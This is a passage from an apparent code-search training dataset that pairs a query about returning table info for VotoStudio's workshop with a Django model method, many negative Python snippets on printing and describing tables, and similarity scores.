file=out_file)\n\n print(\"Assigned types: \", machine.getTypes(), file=out_file)\n print(\"Types histogram: \", machine.types, \"Sum of each type: \", machine.types_sums, \"Makespan : \", machine.span,\n file=out_file)\n print(\"\\n\", file=out_file)\n print(\"Max makespan is : \", makeSpan(), file=out_file)", "def node_memory_allocatable(self) -> units.Quantity:\n stdout, _, _ = RunKubectlCommand(\n # TODO(pclay): Take a minimum of all nodes?\n [\n 'get', 'nodes', '-o',\n 'jsonpath={.items[0].status.allocatable.memory}'\n ])\n return units.ParseExpression(stdout)", "def ls(cls):\n for vm in cls._vm_agents_for_host():\n with vm:\n running = vm.qemu.process_exists()\n\n if running:\n vm_mem = vm.qemu.proc().memory_full_info()\n\n expected_size = (\n vm.cfg[\"memory\"] * 1024 * 1024\n + vm.qemu.vm_expected_overhead * 1024 * 1024\n )\n\n log.info(\n \"online\",\n machine=vm.name,\n cores=vm.cfg[\"cores\"],\n memory_booked=\"{:,.0f}\".format(vm.cfg[\"memory\"]),\n memory_pss=\"{:,.0f}\".format(vm_mem.pss / MiB),\n memory_swap=\"{:,.0f}\".format(vm_mem.swap / MiB),\n )\n else:\n log.info(\"offline\", machine=vm.name)", "def get_memory(self, mem_type='usedMemory'):\n pass", "def get_memory_usage():\n\n memory_usage = {'total' : 0, 'used' : 0}\n meminfo = subprocess.Popen(['free', '-m'], shell=False, stdout=subprocess.PIPE)\n meminfo.stdout.readline()\n total_used = meminfo.stdout.readline()\n memory_usage['total'] = total_used.split()[1]\n memory_usage['used'] = total_used.split()[2]\n return memory_usage" ]
[ "0.70509243", "0.7048715", "0.684797", "0.6824635", "0.6806491", "0.67121667", "0.6675784", "0.66524774", "0.6635588", "0.66292006", "0.65855217", "0.6583841", "0.6535865", "0.65259236", "0.65087706", "0.6496641", "0.64578336", "0.6444816", "0.64439434", "0.63657725", "0.63657725", "0.63657725", "0.63657725", "0.63657725", "0.63657725", "0.63657725", "0.6347976", "0.6283169", "0.6278183", "0.62705874", "0.6260743", "0.6253554", "0.62297696", "0.622765", "0.61809397", "0.6148777", "0.61437875", "0.61392707", "0.61114216", "0.60920465", "0.60700303", "0.6062893", "0.6028777", "0.60236174", "0.5993774", "0.5972191", "0.5969565", "0.59626937", "0.5960566", "0.5927692", "0.59204865", "0.5894464", "0.5893296", "0.5873113", "0.5871291", "0.585255", "0.58517265", "0.5851493", "0.5821422", "0.5808203", "0.5777651", "0.5767466", "0.57633495", "0.57629406", "0.57504296", "0.5724862", "0.571385", "0.56952786", "0.5693873", "0.56848556", "0.56722987", "0.5662998", "0.565931", "0.5658601", "0.56560826", "0.56560826", "0.56500137", "0.5648572", "0.5640975", "0.56405", "0.5640306", "0.56238145", "0.5617173", "0.5614846", "0.5604775", "0.55969423", "0.5586304", "0.5585877", "0.55838585", "0.5583118", "0.5571126", "0.5570619", "0.55677885", "0.5558766", "0.55583346", "0.5558132", "0.55575544", "0.5552457", "0.5546736", "0.5541367" ]
0.74818563
0
Return some simple info for the tables in VotoStudio's workshop.
def get_table_values(self): table_descriptors = getattr(self, 'table_descriptors', None) if not table_descriptors: raise AttributeError(f"Please add the 'table_descriptors' field to the model '{self._meta.label}'") return { 'id': self.id, 'descriptors': [{ 'name': d, 'value': self._get_descriptor_value(d), } for d in table_descriptors], 'app_label': self._meta.app_label, 'model_name': self._meta.model_name, 'model_label': self._meta.label, **self._get_user_info(), }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def show_table():\n\n title_list = ('ID', 'Platform', 'Producer', 'Year', 'Elements')\n \n return table, title_list", "def PrintInfo(self):\n infoname = list(zip(*self.basicinfo.cursor.execute(\n \"SELECT Name FROM Infoname\").fetchall()))[0]\n for obj in infoname:\n s = (\"SELECT Col, Row, TableNum FROM %s WHERE \"\n \"TestItems=%s\" % (self.position, \"'\" + obj + \"'\"))\n [col, row, tablenum] = self.basicinfo.cursor.execute(s).fetchone()\n s = \"SELECT %s FROM TestInfo\" % obj\n content = self.db.cursor.execute(s).fetchone()[0]\n if tablenum is not None:\n self.doc.TableContent(\n tablenum=tablenum, cellrow=row, cellcolum=col,\n insertcontent=content)", "def table_info(self):\n for customer in self.customers:\n print(customer.get_name())", "def info_table(table):\n print \"\\nSCHEMA de la taula \",table, \"es: \"\n con=lite.connect('parking.db')\n cur=con.cursor()\n cur.execute(\"PRAGMA table_info({});\".format(table))\n data = cur.fetchall()\n for d in data:\n print \"\\t\",d[0], d[1], d[2]\n con.close()", "def info(dataset, indent, meta_member, verbose, quiet):\n verbosity = verbose - quiet\n configure_logging(verbosity)\n table = bcdata.validate_name(dataset)\n wfs = WebFeatureService(url=bcdata.OWS_URL, version=\"2.0.0\")\n info = {}\n info[\"name\"] = table\n info[\"count\"] = bcdata.get_count(table)\n info[\"schema\"] = wfs.get_schema(\"pub:\" + table)\n if meta_member:\n click.echo(info[meta_member])\n else:\n click.echo(json.dumps(info, indent=indent))", "def workspace_show_table_format(workspace):\n row = OrderedDict()\n row['Name'] = workspace['name']\n row['Resource Group'] = workspace['resourceGroup']\n row['Location'] = workspace['location']\n row['State'] = workspace['provisioningState']\n return row", "def show_db_overview(self):\n\n models_list = sorted_models_list()\n apps = [p.app_label for p in settings.SITE.installed_plugins]\n s = \"%d apps: %s.\" % (len(apps), \", \".join(apps))\n s += \"\\n%d models:\\n\" % len(models_list)\n i = 0\n headers = [\n #~ \"No.\",\n \"Name\",\n \"Default table\",\n #~ \"M\",\n \"#fields\",\n \"#rows\",\n #~ ,\"first\",\"last\"\n ]\n rows = []\n for model in models_list:\n if True: # model._meta.managed:\n i += 1\n cells = []\n #~ cells.append(str(i))\n cells.append(fmn(model))\n cells.append(model.get_default_table())\n #~ cells.append(str(model))\n #~ if model._meta.managed:\n #~ cells.append('X')\n #~ else:\n #~ cells.append('')\n cells.append(str(len(model._meta.concrete_fields)))\n qs = model.objects.all()\n n = qs.count()\n cells.append(str(n))\n #~ if n:\n #~ cells.append(obj2str(qs[0]))\n #~ cells.append(obj2str(qs[n-1]))\n #~ else:\n #~ cells.append('')\n #~ cells.append('')\n\n rows.append(cells)\n s += rstgen.table(headers, rows)\n return s", "def print_tables(self):\n print \"------------------\\nTables\\n------------------\"\n cnt = 0\n for x in self.show_tables():\n cnt += 1\n print (\"{0}.) {1}\".format(cnt, x[0]))", "def basic_table_details():\n tbl: pa.table = pa.Table.from_pylist([\n {'first_name': 'Kakashi', 'last_name': 'Hatake', },\n {'first_name': 'Itachi', 'last_name': 'Uchiha', },\n {'first_name': 'Shisui', 'last_name': 'Uchiha', },\n ])\n\n results = {\n 'column_names': tbl.column_names,\n 'columns > map > combine_chunks > to_pylist': [col.combine_chunks().to_pylist() for col in tbl.columns],\n 'nbytes': tbl.nbytes,\n 'num_columns': tbl.num_columns,\n 'num_rows': tbl.num_rows,\n 'schema': tbl.schema,\n 'shape': tbl.shape,\n }\n\n print(results)", "def show_data_table(self):\n return self.container['show_data_table']", "def show_table(table):\n # id: string\n # Unique and random generated (at least 2 special char()expect: ';'),\n # 2 number, 2 lower and 2 upper case letter)\n # title: string\n # manufacturer: string\n # price: number (dollars)\n # in_stock: number\n title_list = [\"ID\", \"Title\", \"Manufacturer\",\n \"Price\", \"Number in stock\"]\n ui.print_table(table, title_list)", "def show_catalogue(self):\n\n data = cur.execute(\"\"\"SELECT productid, productname, unitcost, stock, location \n FROM catalogue WHERE vendorname = ?\"\"\", (self.vendorname,)).fetchall()\n print(tabulate(data, headers=[\"Product ID\", \"Name\", \"Unit Cost\", \"Stock\", \"Location\"]))", "async def show(self, table_name: str = ToolDataTableName) -> ToolDataDetails:\n return self.tool_data_manager.show(table_name)", "def getTableHead():\n return [\"Reporter\", \"Reportee\", \"aln. DKIM\", \"aln. SPF\", \"Disposition\",\n \"DKIM result\", \"SPF result\", \"msg#\", \"IP\", \"Country\",\n \"Report Begin\", \"Report End\", \"Report ID\"]", "def _get_table_info(self):\n highestbet = self.highestBetNotFold(),\n bigb =self.bigBlind() if self._game_state == GAME_STATE_PRE_FLOP and not self.inSmallBlindPosition() else 0\n return [\"blinds: small:%r big:%r\" % (self.small_blind, self.big_blind),\n \"buy_ins: min:%r max:%r\" % (self.min_buy_in, self.max_buy_in),\n \"bs: %r\" % self.betting_structure,\n \"highestbet = %r\" % highestbet,\n \"bigb = %r\" % bigb,]", "def table(self):\n return self.snowflake_options.table", "def tableName():\n return \"people\"", "def print_poyo():\n\tpoyo = \"SELECT * FROM poyo\"\n\tcur.execute(poyo)\n\tprint_table(hdrs_poyo)", "def show_all_products():\n\n data = cur.execute(\"\"\"SELECT productid, productname, unitcost, stock FROM catalogue\"\"\").fetchall()\n\n print(tabulate(data, headers=[\"Product ID\", \"Name\", \"Cost\", \"Stock\"]))", "def __print_work_table(table):\n print \"%-5s %-30s %5s %5s %5s %5s %5s\" % ('Act', 'Pred', 'Block', 'Dummy', 'Succ', 'start', 'end')\n for k, col in sorted(table.items()):\n print \"%-5s %-30s %5s %5s %5s %5s %5s\" % tuple(\n [str(k)] + [list(col[0])] + [str(col[i]) for i in range(1, len(col))])", "def info(self) -> str:\n return tabulate(self.model_log_msg, self.head, tablefmt=\"presto\")", "def table_info(self, table_path: str, verbose:bool = True) -> Table:\n dataset, table = table_path.split('.')\n dataset_ref = self.client.dataset(dataset)\n table_ref = dataset_ref.table(table)\n info = self.client.get_table(table_ref)\n if verbose:\n pprint({'created': info.created,\n 'description': info.description,\n 'modified': info.modified,\n 'num_bytes': f'{info.num_bytes:,}',\n 'num_rows': f'{info.num_rows:,}',\n 'schema': info.schema})\n return info", "def tableau():\n return render_template(\n 'tableau.html',\n title='Market Data',\n year=\"2020\",\n message='Your market data page.'\n )", "def print_sansanito():\n\tssn = \"SELECT * FROM sansanito\"\n\tcur.execute(ssn)\n\tprint_table(hdrs_sansanito)", "def index():\n response = \"\"\n for table in config.TABLE_SCHEMA.keys():\n response = response + disco.examples(table)\n return response", "def show_tables(self) -> List[str]:\n return list(self.tb.keys())", "def tableau():\n return render_template(\n 'tableau.html',\n title='Market Data',\n year=datetime.now().year,\n message='Your market data page.'\n )", "def get_TABLE_info():\n defalt_width = 300\n defalt_height = 500\n defalt_thickness = 10\n\n message = 'Put width of table. (mm : int) (width >= 210)'\n width = rs.GetInteger(message, defalt_width, None, None)\n\n message = 'Put height of table. (mm : int) (height >= 250)'\n height = rs.GetInteger(message, defalt_height, None, None)\n\n message = 'Put thickness of material (1layer). (mm : int)'\n t_m = rs.GetReal(message, defalt_thickness, None, None)\n\n TABLE_info = [width, height, t_m]\n\n info = [\"width : %s\" % width, \"height : %s\" % height, \"thickness of material : %s\" % t_m]\n print (info)\n\n return TABLE_info", "def get_table_definition(jwt_payload: dict, schema_name: str, table_name: str):\n DJConnector.set_datajoint_config(jwt_payload)\n\n schema_virtual_module = dj.create_virtual_module(schema_name, schema_name)\n return getattr(schema_virtual_module, table_name).describe()", "def crearTabla(self):\n mensaje = self.base.createTable()\n showinfo('Resultado', mensaje)", "def get(self):\n return TableDetails.query.all(), 200", "def tables():\n return {\n \"MAT24_STD_OCTAD\" : STD_OCTAD,\n }", "def vm_table_view(vlab_api, info):\n vm_body = []\n vm_header = ['Name', 'IPs', 'Type', 'Version', 'Powered', 'Networks']\n for vm, data in info.items():\n body = {'url': data['console']}\n network = data.get('networks', ['?'])\n kind = data['meta']['component']\n version = data['meta']['version']\n power = data['state'].replace('powered', '')\n row = [vm, '\\n'.join(data['ips']), kind, version, power, ','.join(network)]\n vm_body.append(row)\n if not vm_body:\n table = None\n else:\n table = tabulate(vm_body, headers=vm_header, tablefmt='presto')\n return table", "def main():\n national_university_table()", "def index(self):\n s = \"\"\n\n sb = []\n for sim in self.simulations.values():\n url = \"{0.uid}/{0.password}/status\".format(sim)\n sb.append(\"<a href='{0}'>{1.uid}</a></br>\".format(\n url, sim))\n s += \"<b>Simulations running:</b></br>\"\n s += \"\\n\".join(sb)\n\n s += \"<b>List of items in shop:</b>\\n</br>\"\n s += \"\\n</br>\".join(self.shop.itemAndCostDict.keys())\n \n s += \"</br><b>List of all items:</b>\\n</br>\"\n s += \"\\n</br>\".join(item.items.keys())\n\n return s", "def deployment_table(name, details, verbose=False):\n owner = '{} {}'.format(details['owner'], details['email'])\n title = 'Name : {}\\nOwner : {}\\nSummary : {}'.format(name, owner, details['summary'])\n if verbose:\n header = ['Component', 'IP']\n body = [[x, details['machines'][x]['ip']] for x in details['machines'].keys()]\n components = '{}\\n'.format(tabulate(body, headers=header, tablefmt='presto'))\n else:\n components = ''\n return '{}\\n{}'.format(title, components)", "def detailedInfo(cls):\n return 'tbd'", "def detailedInfo(cls):\n return 'tbd'", "def summary(self, light=False):\n tables = self.get_table_list()\n indexes = self.get_index_list()\n res = {}\n lines = []\n\n for t in tables:\n col = self.get_table_columns_list(t)\n if not light:\n size = self.get_table_nb_lines(t)\n first = self.get_table_nfirst_lines(t)\n else:\n size = -1\n first = []\n\n res[t, \"columns\"] = col\n res[t, \"size\"] = size\n res[t, \"first_lines\"] = first\n\n lines.append(t + \"\\t\" + str(size) + \" records\")\n lines.append(\" columns\")\n for c in col:\n lines.append(\" \" + str(c))\n\n if len(first) > 0:\n lines.append(\" first_lines\")\n for lf in first:\n fo = []\n if lf is None:\n lines.append(\" None\")\n else:\n for x in lf:\n if not isinstance(x, str):\n fo.append(str(x))\n else:\n fo.append(x)\n lines.append(\" \" + \"\\t\".join(fo))\n\n if len(indexes) > 0:\n lines.append(\"\\n\")\n lines.append(\"indexes\")\n for tu in indexes:\n if isinstance(tu, (tuple, list)):\n lines.append(\" \" + \"\\t\".join([str(x) for x in tu]))\n else:\n lines.append(\" \" + tu)\n\n attached = self.get_attached_database_list()\n if len(attached) > 0:\n lines.append(\"\\n\")\n lines.append(\"attached databases\")\n for a in attached:\n if a == \"main\":\n continue\n lines.append(\" \" + \"\\t\" + a)\n continue\n # ~ rrr = self.execute(\n # ~ \"SELECT name FROM %s.sqlite_master ORDER BY name;\" %\n # ~ (a,))\n # ~ for b in rrr:\n # ~ lines.append(\" \" + \"\\t\" + b[0])\n\n return res, \"\\n\".join(lines)", "def print_mistakes_table():\n conn = sq.connect(host='localhost', user='root',\n password='student', database='quiz')\n cursor = conn.cursor()\n\n cursor.execute(\"select * from mistakes\")\n data = cursor.fetchall()\n\n table = PrettyTable()\n table.field_names = ['Question', 'Given Answer','User Given Answer']\n for row in data:\n table.add_row(row)\n conn.close()\n\n return table", "def buildSimpleInfoDeclaration(self):\n if self.info == \"\":\n raise Exception(\"Info block empty in symbol: \"+self.name)\n # buid some html to show\n dec = \" <tr>\\n\"\n dec += \" <td><a href=\\\"#\"+self.link+\"\\\">\"+self.name+\"</a></td>\\n\"\n dec += \" <td>\"+self.getPrettyType()\n dec += \"</td>\\n\"\n dec += \" <td>\"+self.info+\"</td>\\n\"\n dec += \" </tr>\\n\"\n return dec", "def wypisz_info(self):\n print(f\"Samochód: {self.producent} {self.model}\")", "def help_description():\n # for ain\n print(\"--------TABLE FOR AIN(AIN4=GND)-------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | AINP | AINN |\")\n for i in range(8):\n print(\"| {} | {} | AIN{} | AIN{} |\".format(str(i), bin(i)[2:].zfill(3), DICT_AIN[i][0],\n DICT_AIN[i][1]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR FSR------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | FSR |\")\n for i in range(6):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_FSR[i]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR RATE------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | RATE |\")\n for i in range(8):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_RATE[i].rjust(7, ' ')))\n print(\"--------------------------------------\")", "def show_tools():\n print(\"\"\"\n List the tools available in this package:\n create_date_features(df, date) #TODO\n create_date_feature_bisiness_quater(df = None, date = None)\n create_date_feature_daytime(df = None, date = None)\n create_date_feature_is_public_holiday(df, date, start, end, country = 'US')\n create_date_feature_is_month_end(df = None, date = None, last = 1)\n create_date_feature_is_weekend(df = None, date = None)\n create_date_feature_is_weekday(df = None, date = None)\n create_date_feature_season(df = None, date = None)\n create_grid(df, keys, target) #TODO\n create_lag_features_with_time_feature(df, cols, time, n = 5, fillna = True)\n create_lag_features_ohne_time_feature(df, cols, n = 5, fillna = True)\n create_window_feature(df, cols = None, col2 = None, win_size = 2, win_type = None, min_periods = 1, agg = 'mean')\n mean_encoder(df, cols, tg)\n \"\"\")", "def dump(self):\n # This is pretty, but we could just return the ddl_string\n outputs = [\"Table : %s\\n\" % self.name]\n # We show the columns in sequence order, using DSU\n # DSU = Decorate, Sort, Undecorate - a.k.a Schwartzian transform\n deco_cols = [ (x['sequence'], x) for x in list(self.columns.values()) ]\n deco_cols.sort()\n cols = [ col for seq, col in deco_cols ]\n for column in cols:\n outputs.append(\" %-30s\" % column['name'])\n if 'length' in column and column['length'] != None:\n if 'precision' in column and column['precision'] != None:\n # This column is a numeric data type\n column_defn = column['type']+self.__class__.calc_precision(column['type'], column['length'], column['precision'], column['scale'])\n else:\n # This column is a text data type\n column_defn = '%s(%d)' % (column['type'], column['length'])\n else:\n # This column is a simple data type such as date or boolean\n column_defn = column['type']\n outputs.append(\" %-15s \" % column_defn)\n if not column['nullable']:\n outputs.append(\" NOT NULL\")\n if 'special' in column:\n # Special case for e.g. 'enum' in MySQL\n outputs.append(' %s' % column['special'])\n outputs.append(\"\\n\")\n # Constraints please\n if len(self.constraints) != 0:\n outputs.append(\" Constraints;\\n\")\n for constraint_name, constraint in list(self.constraints.items()):\n outputs.append(\" %s, \" % constraint_name)\n outputs.append(\"%s \" % (constraint['type']))\n if 'columns' in constraint:\n outputs.append(\": \")\n outputs.append(', '.join(constraint['columns']))\n outputs.append(\"\\n\")\n # Indexes\n if len(self.indexes) > 0:\n outputs.append(\" Indexes:\\n\")\n for index_name, index in list(self.indexes.items()):\n outputs.append(\" %s, \" % index_name)\n outputs.append(\"%s\\n\" % index['type'])\n # Don't check number of columns because there must be at least 1\n outputs.append(\" Columns: \")\n outputs.append(\", \".join(index['columns']))\n outputs.append(\"\\n\")\n # LOG.debug(\"Table Dump output: \" + \"\".join(outputs))\n return \"\".join(outputs)", "def showTables():\n global cursor\n #cursor.execute('SELECT * FROM *')\n cursor.execute('''SELECT * FROM sqlite_master WHERE type='table' ''')\n\n tables = cursor.fetchall()\n print \"Tables available are:\"\n print tables[0]", "def html_data_table(self):\n return \"XXX\"", "def print_all_tables(self):\n conn = self.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n print(cursor.fetchall())", "def print_database(self):\n table_names = self.catalog\n for table_name in table_names:\n table = self.parse_table(table_name)\n if not table:\n continue\n print(f'TABLE NAME: {table_name}\\r\\n')\n print(tabulate(table, headers=\"keys\"))\n print('\\r\\n\\r\\n\\r\\n\\r\\n')", "def table_summary():\n \n t = dict()\n t['name'] = get_names()\n t['Name'] = [get_properties(name)['label'] for name in t['name']]\n N = len(t['name'])\n \n # host\n t['host'] = ['Sagittarius', 'Sagittarius', 'none', 'Gaia-Sausage-Enceladus', 'Sagittarius', 'Sequoia / Arjuna / I\\'itoi', 'Sequoia / Arjuna', np.nan, np.nan, 'Sequoia / Arjuna', 'Gaia-Sausage-Enceladus', 'Sequoia / Arjuna', 'Helmi / Wukong', 'Helmi / Wukong', 'Sagittarius', 'in situ / Helmi / Wukong', 'Helmi / Wukong', 'Cetus', 'Cetus', 'Sagittarius', 'Sequoia / Arjuna / I\\'itoi', 'Cetus', 'Sequoia / Arjuna / I\\'itoi']\n \n # progenitor\n t['progenitor'] = [np.nan, np.nan, 'itself', 'NGC 5139', 'NGC 4590', np.nan, 'NGC 3201', '(Wukong / Helmi)', '(Wukong / Helmi)', np.nan, np.nan, np.nan, np.nan, 'NGC 5024', np.nan, 'NGC 5272', 'NGC 5024', 'NGC 5824', 'NGC 5824', np.nan, np.nan, np.nan, np.nan]\n \n # progenitor type\n t['type'] = ['DG' if name in ['elqui', 'indus', 'jhelum'] else 'GC' for name in t['name']]\n \n # metallicity\n t['feh'] = [-2.4, -2.4, -2.2, -1.5, -2.16, -2.3, -1.5, -2.1, -2.1, -1.6, -1.95, -1.6, -2.7, np.nan, -1.7, -1.1, -2.7, -1.9, np.nan, np.nan, -2.2, np.nan, -1.9]\n \n # associations\n t['friends'] = ['ATLAS', 'Aliqa Uma', np.nan, np.nan, np.nan, np.nan, np.nan, 'Jhelum', 'Indus', np.nan, np.nan, np.nan, np.nan, 'Sylgr', np.nan, np.nan, 'Ravi', 'Turbio', 'Triangulum', np.nan, np.nan, np.nan, np.nan]\n \n tout = Table(t)\n tout.pprint()\n tout.write('../data/stream_origin.fits', overwrite=True)", "def info_on_utils_functions():\n\n table = PrettyTable([\"Utils functions\", \"Description\"])\n table.add_row(\n [\n \"clear_cache()\",\n (\n \"Clears the cache folder. \"\n \"Useful when updating `premise`\"\n \"or encountering issues with \"\n \"inventories.\"\n ),\n ]\n )\n table.add_row(\n [\n \"get_regions_definition(model)\",\n \"Retrieves the list of countries for each region of the model.\",\n ]\n )\n table.add_row(\n [\n \"ndb.NewDatabase(...)\\nndb.generate_scenario_report()\",\n \"Generates a summary of the most important scenarios' variables.\",\n ]\n )\n # align text to the left\n table.align = \"l\"\n table.hrules = ALL\n table._max_width = {\"Utils functions\": 50, \"Description\": 32}\n print(table)", "def show_table(table, has_customer_id=True):\n titles = [\"ID\", \"Title\", \"Price\", \"Date\"]\n if has_customer_id:\n titles.append(\"Customer ID\")\n output_table = [[row[ID], row[TITLE], row[PRICE],\n '/'.join((str(row[YEAR]), str(row[MONTH]), str(row[DAY]))), row[CUSTOMER_ID]] for row in table]\n else:\n output_table = [[row[ID], row[TITLE], row[PRICE],\n '/'.join((str(row[YEAR]), str(row[MONTH]), str(row[DAY])))] for row in table]\n\n ui.clear_scr()\n ui.print_table(output_table, titles, TITLE)", "def show_inventory(table):\r\n if (table):\r\n print('======= The Current Inventory: =======')\r\n print('ID\\tCD Title (by: Artist)\\n')\r\n for row in table:\r\n print('{}\\t{} (by:{})'.format(*row.values()))\r\n print('======================================')\r\n else:\r\n print ('Inventory is empty.\\n')\r\n # return None\r", "def do_ls(self, table: str = None) -> None:\n if table is None:\n table_descriptions = self.engine.describe_all()\n else:\n tables = list(self.engine.connection.list_tables())\n filtered = [t for t in tables if fnmatch(t, table)]\n if len(filtered) == 1:\n print(\n self.engine.describe(\n filtered[0], refresh=True, metrics=True\n ).pformat()\n )\n return\n elif len(filtered) == 0:\n raise EngineRuntimeError(\"Table %r not found\" % table)\n else:\n table_descriptions = [self.engine.describe(t, True) for t in filtered]\n fields = OrderedDict(\n [\n (\"Name\", \"name\"),\n (\"Status\", \"status\"),\n (\"Read\", \"total_read_throughput\"),\n (\"Write\", \"total_write_throughput\"),\n ]\n )\n # Calculate max width of all items for each column\n sizes = [\n 1\n + max([len(str(getattr(t, f))) for t in table_descriptions] + [len(title)])\n for title, f in fields.items()\n ]\n # Print the header\n for size, title in zip(sizes, fields):\n print(title.ljust(size), end=\"\")\n print()\n # Print each table row\n for row_table in table_descriptions:\n for size, field in zip(sizes, fields.values()):\n print(str(getattr(row_table, field)).ljust(size), end=\"\")\n print()", "def print_taboo_spaces(warehouse_id):\n problem_file = \"./warehouses/warehouse_{:02d}.txt\".format(warehouse_id)\n wh = Warehouse()\n wh.load_warehouse(problem_file)\n print(wh)\n print(\"TABOO CELLS: \")\n taboo = taboo_cells(wh)\n print(taboo)", "def print_tables(db):\n # connect to the database and create a cursor\n\n # select all columns using SQL command\n # 'SELECT * FROM StatelessCountByCountry'\n\n # print the data from StatelessCountByCountry\n\n # select all columns using SQL command\n # 'SELECT * FROM StatelessCountByRegion'\n\n # print the data from StatelessCountByRegion", "def show_from_database(self, table_model):\n arr = [4, 1]\n # TODO", "def print_info(self):\n\n n_metabolites = len(self.metabolites)\n n_reactions = len(self.reactions)\n n_constraints = len(self.constraints)\n n_variables = len(self.variables)\n\n info = pd.DataFrame(columns=['value'])\n info.loc['name'] = self.name\n info.loc['description'] = self.description\n info.loc['num constraints'] = n_constraints\n info.loc['num variables'] = n_variables\n info.loc['num metabolites'] = n_metabolites\n info.loc['num reactions'] = n_reactions\n info.index.name = 'key'\n\n print(info)", "def print_table(self):\n print(\"%-12s%-12s%-12s%-12s%-12s\" % (\"index\",\"balance\",\"payment\",\"interest\",\"amortization\"))\n print(\"-------------------------------------------------------------\")\n for i in self.table[\"index\"]:\n print(\"%-12i%-12i%-12i%-12i%-12i\" % (self.table[\"index\"][i],self.table[\"balance\"][i]\\\n ,self.table[\"payment\"][i],self.table[\"interest\"][i],\\\n self.table[\"amortization\"][i]))", "def data(self):\n worksheet_type = self.options[\"worksheet_type\"].value\n\n if worksheet_type.startswith(\"student\"):\n doc, tag, text, line = Doc().ttl()\n with tag(\"h3\"):\n text(WORKSHEET_OPTIONS[worksheet_type])\n\n line(\n \"style\",\n \"\"\"\n table {\n margin-bottom: 1cm;\n }\n td {\n border-collapse: collapse;\n height: 0.5cm;\n margin: 0;\n padding: 0;\n }\n td.bordered-cell {\n border: 1px solid black;\n width: 0.5cm;\n }\n td.label-cell {\n padding-left: 0.5cm;\n font-size: 0.4cm;\n line-height: 0.4cm;\n }\n \"\"\"\n )\n\n with tag(\"p\"):\n text(WORKSHEET_INTRODUCTION_TEXT[worksheet_type])\n\n if worksheet_type == \"student-basic\":\n # Table one\n self.add_run_length_encoding_table(\n tag,\n line,\n 9,\n 18,\n row_labels=[\n \"4, 11\",\n \"4, 9, 2, 1\",\n \"4, 9, 2, 1\",\n \"4, 11\",\n \"4, 9\",\n \"4, 9\",\n \"5, 7\",\n \"0, 17\",\n \"1, 15\",\n ]\n )\n # Table two\n self.add_run_length_encoding_table(\n tag,\n line,\n 13,\n 18,\n row_labels=[\n \"6, 5, 2, 3\",\n \"4, 2, 5, 2, 3, 1\",\n \"3, 1, 9, 1, 2, 1\",\n \"3, 1, 9, 1, 1, 1\",\n \"2, 1, 11, 1\",\n \"2, 1, 10, 2\",\n \"2, 1, 9, 1, 1, 1\",\n \"2, 1, 8, 1, 2, 1\",\n \"2, 1, 7, 1, 3, 1\",\n \"1, 1, 1, 1, 4, 2, 3, 1\",\n \"0, 1, 2, 1, 2, 2, 5, 1\",\n \"0, 1, 3, 2, 5, 2\",\n \"1, 3, 2, 5 \",\n ]\n )\n # Table three\n self.add_run_length_encoding_table(\n tag,\n line,\n 17,\n 18,\n row_labels=[\n \"6, 2, 2, 2\",\n \"5, 1, 2, 2, 2, 1\",\n \"6, 6\",\n \"4, 2, 6, 2\",\n \"3, 1, 10, 1\",\n \"2, 1, 12, 1\",\n \"2, 1, 3, 1, 4, 1, 3, 1\",\n \"1, 2, 12, 2\",\n \"0, 1, 16, 1\",\n \"0, 1, 6, 1, 2, 1, 6, 1\",\n \"0, 1, 7, 2, 7, 1\",\n \"1, 1, 14, 1\",\n \"2, 1, 12, 1\",\n \"2, 1, 5, 2, 5, 1\",\n \"3, 1, 10, 1\",\n \"4, 2, 6, 2\",\n \"6, 6\",\n ]\n )\n else:\n line(\n \"style\",\n \"\"\"\n td.padding-cell {\n width: 0.5cm;\n }\n td.underline-cell {\n border-bottom: 1px solid #999;\n width: 8cm;\n }\n div.dotted-line {\n margin-top: 1cm;\n margin-bottom: 1cm;\n border-top: 1px dotted #888;\n }\n \"\"\"\n )\n self.add_run_length_encoding_table(tag, line, 16, 16, underline=True)\n line(\"div\", \"\", klass=\"dotted-line\")\n self.add_run_length_encoding_table(tag, line, 16, 16, underline=True)\n return {\"type\": \"html\", \"data\": doc.getvalue()}\n else:\n image = Image.open(\"static/img/resources/run-length-encoding/teacher-worksheet.png\")\n image = image.rotate(270, expand=True)\n return {\"type\": \"image\", \"data\": image}", "def table(self):\n return self.t", "def table_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"table_name\")", "def getTableInfo(self, lsstLevel, dbName, tableName):\n return self._doRequest(self.httpClient.getTableInfo, lsstLevel, dbName, tableName)", "def _show_info(self):\n\n dataframe = self._cache.get_source(config.DATAFRAME_ARTISTS)\n dataframe.printSchema()", "def _get_table(self, cursor):\n raise NotImplementedError", "def print_quick_report():\r\n print('function not yet written')\r\n # print a summary of the report as a structured pandas dataframe\r\n #Summary will include only date title and sentiment\r", "def details(self):\n pass", "def experiment_show_table_format(experiment):\n from msrestazure.tools import parse_resource_id\n row = OrderedDict()\n row['Name'] = experiment['name']\n row['Resource Group'] = experiment['resourceGroup']\n row['Workspace'] = parse_resource_id(experiment['id'])['name']\n row['State'] = experiment['provisioningState']\n return row", "def show_data(self, ):\r\n return print('society_name : {}\\n'\r\n 'flat : {}\\n'\r\n 'house_no : {}\\n'\r\n 'no_of_members : {}\\n'\r\n 'income : {}\\n '\r\n .format(self.society_name, self.flat, self.house_no, self.no_of_members, self.income))", "def table(cls):\n return cls.__name__", "def product_tables(self): \r\n\r\n self.mycursor.execute('CREATE TABLE IF NOT EXISTS product(\\\r\n PROD_id BIGINT PRIMARY KEY,\\\r\n PROD_name VARCHAR(100) NOT NULL,\\\r\n PROD_grade CHAR(1) NOT NULL,\\\r\n PROD_url VARCHAR(150) NOT NULL UNIQUE)')", "def __str__(self):\n tabuleiro = prettytable.PrettyTable(header=False)\n for linha in self.tabuleiro:\n tabuleiro.add_row(linha)\n return str(tabuleiro)", "def getTable(self):\n\n raise NotImplementedError", "def parse_table_schema(conn):\r\n cur = conn.cursor()\r\n\r\n cur.execute(\"PRAGMA 